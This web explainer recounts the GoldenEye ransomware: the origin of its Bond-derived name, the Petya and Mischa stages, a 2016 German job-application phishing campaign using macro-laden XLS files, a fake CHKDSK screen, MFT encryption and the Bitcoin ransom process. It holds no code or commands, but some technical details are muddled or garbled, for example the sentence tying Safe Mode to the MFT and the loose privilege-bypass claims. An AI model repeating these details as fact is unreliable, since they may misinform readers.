What is GoldenEye Ransomware Attack?

Anti VirusCyber SecuritySafe & Security

You've undoubtedly watched the movie GoldenEye if you're a Bond fan. The name of the ransomware program, GoldenEye, was inspired by this. The name of the hacker collective is also borrowed from the film.

In the movie GoldenEye, the Janus Syndicate, a Russian organized crime group, exploits the instability caused by the fall of the Soviet Union by breaking into the control systems of two Soviet satellites. Petya and Mischa are the names of these satellites. They then fire GoldenEye, an electromagnetic pulse weapon.

The Petya ransomware was created b" a Russian hacker gang that adopted the moniker Janus and one of its satellites. Mischa was accessible when they sought a different moniker for their second virus. The hackers turned to the movie's title because there were only two satellites in the picture when they were searching for a third name. The hackers' strong affinity for this made-up criminal organization suggests that they are Russian.

What Makes GoldenEye Special?

The GoldenEye ransomware combines two methods of attack. First, a pair of viruses are downloaded. Petya and Mischa are the names of this. Second, these infections encrypt data and demand payment to receive the decryption key, just like any ransomware.

Petya was revolutionary at the time since it encrypts the entire system rather than just individual files. With this method, encryption cannot be defeated. The attacks on Petya and GoldenEye are not launched by their owners. Instead, these computers are offered as a Ransomware-as-a- Service to other users. Thus, a wide variety of individuals were in charge of the several targeted attacks.

Petya was initially made available in a Beta version to a small number of users. Because the ransom message and logo were shown on a red background, this was known as Red Petya. Petya was unsuccessful, sadly, because it needed Administrator rights to access the operating system and carry out its encryption.

When the system was made available to the public, the creators made design improvements and modified the color scheme to make Green Petya. Unfortunately, this version included Mischa, which encrypts files and behaves like a standard ransomware attacker. Now that it had tried its low-level attack, the Petya system unleashed Mischa if it failed to reach the Administrator level.

Version 2.5 of the interim release contains fixes for the ransomware's flaws. Green Petya was still in use for this. GoldenEye was the ultimate system by the time Petya 3.0, the fourth edition, was released. Petya and Mischa are both launched by GoldenEye, with Mischa running first. So, this system uses two encryption layers. The livery of GoldenEye differs from Green Petya in that it is yellow and black.

Origin of the GoldenEye Ransomware

Janus Cybercrime Solutions is the name of the company that developed GoldenEye. This is not a significant hacking organization supported by a state. However, hints in the group's branding, name patterns, and artwork point to a Russian base.

A Twitter account run by Janus Cybercrime Solutions went by the handle Janus Secretary. The profile hasn't had any recent posts, despite the fact that the account was active in 2016 and 2017.

How Does the GoldenEye Malware Operate?

GoldenEye lived a brief existence. Its first assaults began on December 5th, 2016, and its campaign did not endure the entire year. Petya's prior iterations all communicated with its targets in English, but GoldenEye did it in flawless German. It was a customized version of a system that was available as Ransomware-as-a-Service. It's odd that the Janus organization would select only to attack Germany. It's probable that GoldenEye was specially created for one of the Petya RaaS platform's important clients.

The research was the first step in the GoldenEye attack invasion process. Every one of the targets was a company posting job openings. Therefore, GoldenEye was not utilized for mass mailings; the targeting email was sent in response to an advertisement. Rolf Drescher was always the sender of the emails. An attack on the German cybersecurity firm "Dipl.- Ing. Rolf B. Drescher VDI & Partner", which provided Petya mitigation services, was intended. Targets received an email with a PDF resume and an XLS file as attachments. The GoldenEye installation is included in the XLS file as macros that run when the file is opened.

The macros established a connection to a distant server, downloaded the Mischa-specific code, and then ran it. The low-level Petya code was then copied down and executed by the installation. GoldenEye had improved Petya and got past the restriction on operating systems that did away with the need for the user account to have Administrator rights in order to access the operating system.

GoldenEye crashed the computer upon startup and forced a restart. The user was then presented with a fictitious English-written CHKDSK screen. This displayed a progress bar that appeared to represent the check's progression. This fronted the encryption procedure, though.

By abusing a flaw in the Windows operating system, GoldenEye was able to encrypt the Master File Table, rewrite the Master Boot Record (MBR), and disable the Safe Mode starting option (MFT). The GoldenEye system employs Salsa20 encryption for its Petya procedures and RSA and AES encryption ciphers for its Mischa phase.

When the MFT encryption procedure is finished, the computer displays the GoldenEye emblem along with a text-based skull and crossbones. The directions for paying the ransom were then displayed.

The victim was told to download the Tor browser, go to a specific website, and enter a special ID in order to recover from this attack. The victim was then given instructions on this website on how to pay the ransom in Bitcoin. After making the payment, the user received a decryption key for the MFT locker and a decryptor tool to undo the Mischa encryption.

The decryption procedure performed successfully, in contrast to some ransomware systems, and targets who paid the ransom were able to recover fully.

Updated on 05-Aug-2022 12:48:59